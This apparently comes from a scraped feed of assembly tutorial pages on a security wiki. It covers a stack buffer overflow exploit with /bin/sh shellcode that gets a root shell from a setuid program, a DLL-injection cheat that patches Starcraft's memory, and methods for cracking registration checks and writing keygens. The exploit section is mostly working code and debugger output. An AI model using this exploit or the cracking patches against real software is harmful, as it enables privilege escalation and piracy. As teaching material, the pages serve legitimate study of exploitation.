Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x38373635. Remembering ascii, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: Stackexploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc Stackexploit.c -o Stackexploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return addres<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identicly, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, 0);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = &string;<br />
<br />
/* Finally, ow call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, 0);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop sleds are very common in exploits, unless the return address is in a predictable location.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_7&diff=3164Example 72012-01-16T23:25:33Z<p>Killboy: /* Creating the .dll */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is what this entire tutorial has been building up to: writing a cheat for a game! <br />
<br />
I have chosen the simplest cheat I can think of that demonstrates most of the concepts I've attempted to teach: displaying a notification whenever a player spends minerals in Starcraft. <br />
<br />
This demonstration will use Starcraft 1.05. There are two reasons:<br />
* So it can't easily be translated to modern versions, which should avoid pissing off Blizzard. <br />
* Because the newer versions break TSearch, and I don't really want to find/write another memory searcher. <br />
<br />
Two locations need to be found:<br />
* The function that can be called to display messages on-screen. <br />
* The function that is called when minerals are spent. <br />
<br />
== Creating the .dll ==<br />
This .dll will be written in Microsoft Visual Studio and injected with my [http://www.javaop.com/~ron/programs/Inject.zip Injector]. <br />
<br />
Here's how to create the .dll (this works in Visual Studio 2005):<br />
* Run Visual Studio.<br />
* Create a new project.<br />
* Choose "Win32 Console Application" and give it a name.<br />
* In the wizard, set the application type to "DLL".<br />
* Disable "Precompiled header" (you don't have to, but I prefer to). <br />
<br />
I generally start by removing all the crap that Visual Studio adds, then I add a switch over the two conditions I care about. Here's the starting code:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <windows.h><br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
break;<br />
}<br />
<br />
return TRUE;<br />
}<br />
</pre><br />
<br />
This should compile into a .dll file, which can be injected/ejected (though it does nothing).<br />
<br />
== Displaying Messages ==<br />
Finding the function to call is always tricky. It goes back to the same principle as finding the place to crack a game: you have to find a starting point, and trace your way to the appropriate function. Depending on the game, this could be significantly difficult. <br />
<br />
Some ways to do this might be:<br />
* Searching for messages you see on the screen. <br />
* Typing a message, searching in memory for it, and pressing enter.<br />
* Figuring out how events in Use Map Settings games work. <br />
<br />
The first message I think of that's displayed on-screen is chat messages from other players, which look like "player: message". Another common chat message is "[team] player: message". That seems like a good place to start looking. <br />
<br />
In IDA, load Starcraft.exe and wait till it finishes analysis. Then go to the strings window/tab and search (by typing it in) for "[", and the first result is "[%s] %s: %s". Anybody who knows C format strings will know that, in a format specifier, %s indicates a string. Since we have a reasonable idea of how strings work, we can guess that "%s: %s" would be a normal message, so we search for that and double-click it. <br />
<br />
The address of that string should be 0x004F2AE0. If it's not, you might be on the wrong version of Starcraft, which should be fine. Just remember that the addresses I provide may not be right. <br />
<br />
On that address, press ctrl-x. There's only one cross reference, at sub_004696C0+105, so double-click that. We see that this string is a function call, shown here:<br />
push eax<br />
push offset aSS_2<br />
push 100h<br />
push ecx<br />
call sub_4D2820<br />
<br />
Anybody well-versed in C will likely recognize this as a call to snprintf(). The first variable, ecx, is the buffer. Then 100h is the length, aSS_2 ("%s: %s") is the format string, and the two string that are substituted for %s are eax and (not shown here) edi. <br />
<br />
Since ecx is a volatile variable, it's likely going to change after the function call, which means that this code won't be reliant on the value. If we look above, we can find where ecx is loaded with the buffer:<br />
lea ecx, [esp+110h+var_100] <br />
Note that the frame pointer isn't being used here, but that IDA still managed to name the local variable. Click on var_100, press 'n', and call it 'buffer'. <br />
<br />
On the line before, you should see:<br />
lea eax, dword_6509E3[esi]<br />
This is the first string parameter that will be substituted, which means it corresponds to the first %s, which is the player's name. Presumably "esi" is the player number. This will be important later. <br />
<br />
Click on the "buffer" variable you defined to highlight all instances of it, then scroll down. You'll eventually see the buffer put into ecx right before a function call, which indicates a __fastcall function. If you double-click on that function and scroll way down to the bottom, you'll find the return is:<br />
retn 8<br />
So now we know that it's a __fastcall with two stack parameters, so a total of four parameters. <br />
<br />
Press "Esc" to get back. <br />
<br />
Looking at edx, we see that it gets its value from ebx, and involves a subtraction. If you follow ebx up the function, you'll see that esi is derived from it, so presumably ebx is or involves the player number. For now, we'll ignore that, and set it to 0. <br />
<br />
The first stack parameter (that is, the last one pushed) is "eax". Remember that eax is the return variable. The function GetTickCount() is called just above the push, then 0x1B58 is added to the result. Right-click on the 0x1B58 to see the variable in different forms. In decimal, it's "7000". That's a much better number, so click on that. <br />
<br />
GetTickCount() returns the number of milliseconds that Windows has been running. Adding 7000 milliseconds, or 7 seconds, creates the time it will be in 7 seconds. Messages in Starcraft stay on the screen for roughly 7 seconds, so presumably this parameter is the time for a message to stop displaying. <br />
<br />
Finally, the last stack parameter is 0. That's nice and easy! <br />
<br />
As for the return value, eax isn't used after the function call, so there may not be a return value. We won't worry about it. <br />
<br />
So now we can define the function this way:<br />
void __fastcall DisplayMessage(char *strMessage, int unknown, DWORD dwDisplayUntil, int unknown0);<br />
<br />
It's not necessary here, but for education, do the following:<br />
* Double-click on the display function (sub_469380)<br />
* Scroll up, and click on the function's name<br />
* Press 'n', and call it 'DisplayMessage'<br />
* Press 'y', and define it as shown above (don't forget the semicolon).<br />
* Press 'Esc' to get back to where the function is called. <br />
<br />
If you're using a modern version of IDA (support for __fastcall started fairly late), you'll see that the parameters to this function are commented now. <br />
<br />
Of course, we have to test it works, now. We already have a .dll that can be loaded, so we'll add a function to it. Here's the function:<br />
<br />
<pre><br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
</pre><br />
<br />
Then to test, add a call to this function from DLL_PROCESS_ATTACH in DllMain(), and you're ready to test your first hack! <br />
<br />
To test this: <br />
* Run Starcraft<br />
* Start a single player game (if you had the newest version, this would work in multiplayer too)<br />
* Alt-tab out<br />
* Run injector.exe<br />
* Tell it to inject in the "Starcraft" window, and give it the full path to the .dll file<br />
* Press "Inject"<br />
* Go back into the game<br />
* Hopefully your message will be waiting! <br />
<br />
[[Example_7_Step_1|Click here]] for the full code. <br />
<br />
Another option that I've started using more recently is to use a function pointer:<br />
<pre><br />
typedef void (__fastcall *fcnShowMessage) (const char* strMessage, int unk, int intDisplayUntil, int unk0);<br />
static const fcnShowMessage ShowMessage = (fcnShowMessage) 0x00469380;<br />
</pre><br />
<br />
[[Example_7_Step_1b|Click here]] for the full code using a function pointer. <br />
<br />
<br />
== Mineral Spending ==<br />
<br />
We're going to use TSearch to track down the function called when a user spends minerals. <br />
<br />
This is very simple to do, and requires only a memory search (with TSearch) on the address of your minerals. That will lead you back to the code that can be patched, which means your hack will know every time minerals are spent. You should be able to do this on your own, based on what you learned in "Memory Searching", but here's the Starcraft-specific way:<br />
<br />
* Start a game of Starcraft against the computer, but don't start mining. <br />
* Alt-tab out, run TSearch, and attach it to Starcraft. <br />
* Search (in the left pane) for "50", 4 bytes (minerals can go over 65000). <br />
* Go back to the game, and mine one chunk of minerals. <br />
* Go back to TSearch, and search for "58". <br />
* Go to Starcraft and buy an SCV/Drone/Probe. <br />
* Go back to TSearch and search for "8"<br />
* Repeat until you're down to two or three results<br />
* Test the one at address 0x006xxxxx by changing it, go back to the game, and watch your minerals fall back to where they were. If you don't see one at this address, don't worry. It's only the display number. <br />
* Test the one at 0x004xxxxx, and watch your minerals stay constant. <br />
* Double-click on the good value<br />
* Under the "AutoHack" menu choose "Enable Debugger"<br />
* Right-click on the row in the right pane, and click "AutoHack"<br />
* Under the "AutoHack" menu, choose "AutoHack Window"<br />
* Go back into the game, and spend some minerals<br />
* Take a look at the "AutoHack Window", you should see exactly one result. If you harvested some money first, you'll see more, but use the last one. <br />
<br />
By now, you should have determined that your minerals are stored at or near 0x004FEE5C, and the address where the minerals changed should be 0x0040208F. <br />
<br />
So load up Starcraft.exe in IDA and jump down to 0x0040280F. You should see a function that looks like this (I've indicated the line where your minerals are written):<br />
<br />
<pre><br />
.text:00402070 51 push ecx<br />
.text:00402071 88 4C 24 00 mov byte ptr [esp+1+var_1], cl<br />
.text:00402075 8B 44 24 00 mov eax, [esp+1+var_1]<br />
.text:00402079 25 FF 00 00 00 and eax, 0FFh<br />
.text:0040207E C1 E0 02 shl eax, 2<br />
.text:00402081 8B 88 58 65 51 00 mov ecx, dword_516558[eax]<br />
.text:00402087 8B 90 58 EE 4F 00 mov edx, dword_4FEE58[eax]<br />
.text:0040208D 2B D1 sub edx, ecx<br />
.text:0040208F 89 90 58 EE 4F 00 mov dword_4FEE58[eax], edx ; <-- This line<br />
.text:00402095 8B 90 B8 65 51 00 mov edx, dword_5165B8[eax]<br />
.text:0040209B 29 90 88 EE 4F 00 sub dword_4FEE88[eax], edx<br />
.text:004020A1 59 pop ecx<br />
.text:004020A2 C3 retn<br />
</pre><br />
<br />
This function is pretty straight forward, although it does something weird: it preserves ecx. I don't know why that happens. <br />
<br />
On the second line, cl (part of ecx) is used, so we know this is __fastcall. edx is overwritten, so we know that this function has one parameter. Note that the one parameter is used as an array index into the array that stores your mineral count. It is pretty safe to assume that this is an array index. <br />
<br />
To summarize this function:<br />
* Store ecx's lowest byte in var_1<br />
* Get rid of the top 3 bytes of eax (if the mov had been movzx, this would have automatically happened). <br />
* Shift eax two bits left. This has the same affect as multiplying by 4, which likely means it's an index into an array of 4-byte values<br />
* Use eax as an index into two arrays, and subtract them from each other. We know the first is our minerals, the second is unknown, but it should be obvious that the second is the amount you're spending. <br />
* Put the new value, after the subtraction, back into the array. <br />
* Move another variable into edx, and subtract it from yet another variable. <br />
<br />
The usage of this function is pretty obvious, so we can go ahead and write the patch! <br />
<br />
== The Wrapper == <br />
<br />
The best place I see to patch is right after 0x0040208F. At this point, the variables all contain useful values:<br />
* eax = 4 * player number<br />
* ecx = the amount spent<br />
* edx = the new mineral total<br />
<br />
Here's the patch we want to make, and I've assigned everything machine code from a handy dandy reference (IDA):<br />
89 90 58 EE 4F 00 mov dword_4FEE58[eax], edx ; The overwritten code<br />
60 pushad ; Preserve<br />
52 push edx ; Push the three parameters<br />
51 push ecx<br />
50 push eax<br />
e8 xx xx xx xx call HackFunction ; Note that this is __stdcall<br />
61 popad<br />
c3 ret<br />
<br />
Or, in a C string:<br />
char *wrapper = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8AAAA\x61\xc3"; <br />
<br />
== The Patch ==<br />
<br />
This is mostly taken from the section on .dll injection, with a small modification to the machine code wrapper to add some pushes, and to the hack function to support the three parameters:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to equal the distance between HackFunction and from the byte immediately<br />
* after the ????, which is 12 bytes from the beginning of the string (that's where the relative distance<br />
* begins) */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x29\x90\x88\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
<br />
</pre><br />
<br />
== Add the Display Function ==<br />
I wrote the function to display text earlier on this page. Now would be a good time to add that to the project. At the same time, add a few calls to it that'll display what's going on:<br />
<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
char buffer[200];<br />
<br />
player = player >> 2;<br />
sprintf_s(buffer, 200, "\x04Player %d spent \x02%d \x04minerals, leaving him with %d", player, spent, remaining);<br />
DisplayMessage(buffer, 5);<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to equal the distance between HackFunction and from the byte immediately<br />
* after the ????, which is 12 bytes from the beginning of the string (that's where the relative distance<br />
* begins) */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x29\x90\x88\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Attached!", 10);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Removed!", 10);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
</pre><br />
<br />
== Finishing Touches ==<br />
That function will display a nice notification when a player spends minerals, but only the numeric player number is given, which isn't especially helpful. <br />
<br />
Recall that, while looking for the display function, we found the array of player names. Here's the code that prepares the message:<br />
.text:004697BA 8D 86 E3 09 65 00 lea eax, dword_6509E3[esi]<br />
.text:004697C0 8D 4C 24 10 lea ecx, [esp+110h+buffer]<br />
.text:004697C4 50 push eax<br />
.text:004697C5 68 E0 2A 4F 00 push offset aSS_2 ; "%s: %s"<br />
.text:004697CA 68 00 01 00 00 push 100h ; size_t<br />
.text:004697CF 51 push ecx ; char *<br />
.text:004697D0 E8 4B 90 06 00 call sub_4D2820<br />
<br />
The first parameter is ecx, which is an empty buffer. The second parameter, 0x100, is the size of the buffer. The third parameter is the format string, "%s: %s", indicating the the last two parameters are the username and the message. <br />
<br />
The fourth parameter is eax. The eax comes from dword_6509E3[esi], which means that esi is indexing into an array in memory. So from there, we can look above and figure out where esi came from:<br />
.text:00469749 8D 34 DB lea esi, [ebx+ebx*8]<br />
.text:0046974C C1 E6 02 shl esi, 2<br />
<br />
Going to the top of the function, we see that ebx was a parameter, and is compared to 8. Since a Starcraft game can have up to 8 players, it's reasonable to assume that ebx is the player number. Therefore, we need to emulate these three lines:<br />
.text:00469749 8D 34 DB lea esi, [ebx+ebx*8]<br />
.text:0046974C C1 E6 02 shl esi, 2<br />
.text:004697BA 8D 86 E3 09 65 00 lea eax, dword_6509E3[esi]<br />
<br />
Which can easily be done like this:<br />
int esi = ebx + ebx*8;<br />
esi = esi << 2;<br />
char *player = (char*) 0x6509e3 + esi; <br />
<br />
Which reduces to simply:<br />
So the first line multiplies the player by 9, and the next line shifts it left by 2, which is the same as multiplying by 4. 9 * 4 = 36, so that's what we use:<br />
char *player = (char*) 0x6509e3 + (playernum * 36); <br />
Recall that, in the assembly function, the player number is shifted left twice. That means that, to get the proper number here, we have to right-shift it twice before we use it:<br />
char *player = (char*) 0x6509e3 + ((playernum >> 2) * 36); <br />
<br />
Adding that to our code, we get this completed hack:<br />
<pre><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <windows.h><br />
<br />
/* This function displays a message on the screen for the specified number of seconds. */<br />
void __stdcall DisplayMessage(char *strMessage, int intDurationInSeconds)<br />
{<br />
int intDisplayUntil = GetTickCount() + (intDurationInSeconds * 1000);<br />
int fcnDisplayMessage = 0x469380;<br />
<br />
__asm<br />
{<br />
push 0<br />
push intDisplayUntil<br />
mov edx, 0<br />
mov ecx, strMessage<br />
call fcnDisplayMessage<br />
}<br />
}<br />
<br />
/* This function is called whenever a player spends money. */<br />
void __stdcall HackFunction(int player, int spent, int remaining)<br />
{<br />
char buffer[200];<br />
/* This address is an array of names. Recall that the player is left-shifted twice in the "SpendMoney" function, so<br />
* the shift here ends up with the same number. */<br />
char *name = (char*) 0x6509e3 + ((player >> 2) * 36); <br />
<br />
/* Create a string to display, then display it. */<br />
sprintf_s(buffer, 200, "\x04%s spent \x02%d \x04minerals, leaving him with %d", name, spent, remaining);<br />
DisplayMessage(buffer, 5);<br />
}<br />
<br />
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)<br />
{<br />
/* This is the address in the game where the patch is going */<br />
int intAddressToPatch = 0x0040208F;<br />
<br />
/* This creates the wrapper, leaving an "????" where the call distance will be inserted. */<br />
static char strWrapper[] = "\x89\x90\x58\xee\x4f\x00\x60\x52\x51\x50\xe8????\x61\xc3";<br />
<br />
/* This sets the "????" in the string to equal the distance between HackFunction and from the byte immediately<br />
* after the ????, which is 12 bytes from the beginning of the string (that's where the relative distance<br />
* begins) */<br />
*((int*)(strWrapper + 11)) = ((int) &HackFunction) - ((int) strWrapper + 15); <br />
<br />
/* This is the actual patch */<br />
char strPatch[] = "\xe8????\x90";<br />
<br />
/* This replaces the ???? with the distance from the patch to the wrapper. 5 is added because that's <br />
* the length of the call instruction (e8 xx xx xx xx xx) and the distance is relative to the byte <br />
* after the call. */<br />
*((int*)(strPatch + 1)) = ((int) &strWrapper) - (intAddressToPatch + 5);<br />
<br />
/* This is the original buffer, used when the .dll is removed (to restore the program's original <br />
* functionality) */<br />
char *strUnPatch = "\x29\x90\x88\xee\x4f\x00";<br />
<br />
/* The process handle is required to write */<br />
HANDLE hProcess = GetCurrentProcess();<br />
<br />
switch(ul_reason_for_call)<br />
{<br />
case DLL_PROCESS_ATTACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Attached!", 10);<br />
break;<br />
<br />
case DLL_PROCESS_DETACH:<br />
WriteProcessMemory(hProcess, (void*) intAddressToPatch, strUnPatch, 6, NULL);<br />
DisplayMessage("\x03 Demo Plugin Removed!", 10);<br />
break;<br />
}<br />
return TRUE;<br />
}<br />
</pre><br />
<br />
== In Action! ==<br />
Here's a screenshot of the plugin in action:<br />
<br />
[[image:screenshot.jpg]]<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Cracking_a_Game&diff=3163Cracking a Game2012-01-16T22:59:22Z<p>Killboy: /* Finding the Spot */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over several techniques used by crackers to register games/software. I don't mention cd-cracks, because I don't know how to do those; rather, I mention attacks that are generally based on a key or registration code. <br />
<br />
== Common Protections ==<br />
<br />
The most common protection, and the one discussed here, is when a program requires a registration key to unlock. Usually, the key is based either on a random registration code provided by the program, or based on the username you enter. <br />
<br />
I'll list some definitions here. Note that these definitions are mine, and won't necessarily correspond to definitions others use. These are simply to make it easier to understand this and proceeding sections:<br />
* A '''''registration code''''' is a code generated by a program, that the registration key is derived from or checked against.<br />
* A '''''registration username''''' or just username is a username that a user enters. The registration key is based on that username. <br />
* A '''''registration key''''' is the key used to unlock a program. It may be based on a registration code, on a registration username, or based on nothing at all. <br />
<br />
<br />
== Finding the Spot ==<br />
<br />
The very first example goes over Starcraft's CDKey verification algorithm, but I provided the algorithm. Starcraft's is the simplest kind of verification, the key verifies itself without a username or code. The question is, how do you find the algorithm?<br />
<br />
Well, the unfortunate answer is, it varies, and it generally isn't easy. <br />
<br />
The first step is obviously to disassemble the program. After that, as a cracker, you have to try and find a weak point in the program. Here are several techniques:<br />
* Search for the text prompting for the key<br />
* Search for the registration code in memory, and find out where it's accessed<br />
* Enter a code, have it fail, then search memory for that failed code<br />
* Search for anything unique about the registration (colors, text, dialogs, etc).<br />
* Search for the registry key that stores the key<br />
* Search for a file that stores registration information<br />
* Search for the error message when a bad key is given<br />
<br />
The last technique is the most useful one, I've found. However, trying them all, and trying anything else that seems to suit the game works best. In the example in the next section, I found that searching for the text informing the user that the software is unregistered worked well for the game, as you'll see later. I may do a second example where I searched for the file that stored the key, and where it was created. <br />
<br />
To find Starcraft's CDKey verifier, I started with the network traffic, at the Winsock function (send() and recv()). From there, I backtracked to find where the packet is sent that validates the Starcraft key with Battle.net. It was a lot of work, but at the time I was learning about Starcraft's network activity so it was mostly a side-effect of what I was already doing. If I continue writing these tutorials, I might eventually get into that much detail, but I have no plans to yet.<br />
<br />
== Cracking the Game ==<br />
Once the right spot is found, cracking a game is often very easy. Typically, a program will have the following code:<br />
<pre><br />
if(keyIsValid)<br />
unlock()<br />
else<br />
displayError()<br />
</pre><br />
<br />
The assembly for that would look like:<br />
85 xx test keyIsValid, keyIsValid<br />
74 06 jz error<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
As discussed in the section on machine code, the bytes to the left may be the machine code bytes (I did them quickly from a reference sheet, so they may or may not be exactly correct. This program can be modified by changing a couple bytes, which can either force the code to jump always or jump never.<br />
<br />
To force the code to jump (which, in this case, will make the key always valid), the jz is replaced with a jmp (by changing 74 to eb):<br />
85 xx test keyIsValid, keyIsValid<br />
eb 06 jmp error<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
To prevent the code from jumping (which, in this case, will make the key always valid), the jz is replaced with a pair of nop instructions:<br />
85 xx test keyIsValid, keyIsValid<br />
90 nop<br />
90 nop<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
Make the appropriate change, run the game, and type in any code. The expected result should occur! <br />
<br />
The next example will show this on an actual game (on a game that I won't name here, for obvious reasons). <br />
<br />
== Writing a Keygen ==<br />
Even better than cracking a game is writing a keygen for it. The user enters their username or registration code, and the keygen outputs a valid key. <br />
<br />
Generally, this requires that the algorithm be fully reverse engineered and understood. Then a copy of it is made in C (or whatever language) which produces the same results. Note that the first three examples in this tutorial do just that: turning the assembly code back into C. So anybody who actually followed them should be in a good position to write a keygen, which will come in a later tutorial. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Cracking_a_Game&diff=3162Cracking a Game2012-01-16T22:56:37Z<p>Killboy: </p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section will go over several techniques used by crackers to register games/software. I don't mention cd-cracks, because I don't know how to do those; rather, I mention attacks that are generally based on a key or registration code. <br />
<br />
